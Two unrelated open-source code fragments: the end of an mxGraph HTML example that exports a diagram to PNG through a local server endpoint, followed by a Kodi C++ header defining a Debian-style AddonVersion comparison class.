vs); imgExport.drawState(graph.getView().getState(graph.model.root), xmlCanvas); // Puts request data together var w = Math.ceil(bounds.width * scale / vs + 2 * b); var h = Math.ceil(bounds.height * scale / vs + 2 * b); var xml = mxUtils.getXml(root); if (bg != null) { bg = '&bg=' + bg; } new mxXmlRequest('/Export.ashx', 'filename=export.' + format + '&format=' + format + bg + '&w=' + w + '&h=' + h + '&xml=' + encodeURIComponent(xml)). simulate(document, '_blank'); } // Exporting to bitmap using ExportServlet document.body.appendChild(mxUtils.button('Export PNG', function () { exportFile('png'); })); } }; </script> </head> <!-- Page passes the container for the graph to the program --> <body onload="main(document.getElementById('graphContainer'))"> <!-- Creates a container for the graph with a grid wallpaper --> <div id="graphContainer" style="position:relative;overflow:hidden;width:321px;height:241px;border:1px solid gray;cursor:default;"> </div> </body> </html>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005-2018 Team Kodi * This file is part of Kodi - https://kodi.tv * * SPDX-License-Identifier: GPL-2.0-or-later * See LICENSES/README.md for more information. */ #pragma once #include <string> namespace ADDON { /* \brief Addon versioning using the debian versioning scheme AddonVersion uses debian versioning, which means in the each section of the period separated version string, numbers are compared numerically rather than lexicographically, thus any preceding zeros are ignored. i.e. 1.00 is considered the same as 1.0, and 1.01 is considered the same as 1.1. Further, 1.0 < 1.0.0 See here for more info: http://www.debian.org/doc/debian-policy/ch-controlfields.html#s-f-Version */ class AddonVersion { public: AddonVersion(const AddonVersion& other) { *this = other; } explicit AddonVersion(const std::string& version); explicit AddonVersion(const char* version = nullptr); virtual ~AddonVersion() = default; int Epoch() const { return mEpoch; } const std::string &Upstream() const { return mUpstream; } const std::string &Revision() const { return mRevision; } AddonVersion& operator=(const AddonVersion& other); bool operator< (const AddonVersion& other) const; bool operator> (const AddonVersion& other) const; bool operator<=(const AddonVersion& other) const; bool operator>=(const AddonVersion& other) const; bool operator==(const AddonVersion& other) const; bool operator!=(const AddonVersion& other) const; std::string asString() const; bool empty() const; static bool SplitFileName(std::string& ID, std::string& version, const std::string& filename); protected: int mEpoch; std::string mUpstream; std::string mRevision; static int CompareComponent(const char *a, const char *b); }; inline AddonVersion& AddonVersion::operator=(const AddonVersion& other) = default; }
{ "pile_set_name": "Github" }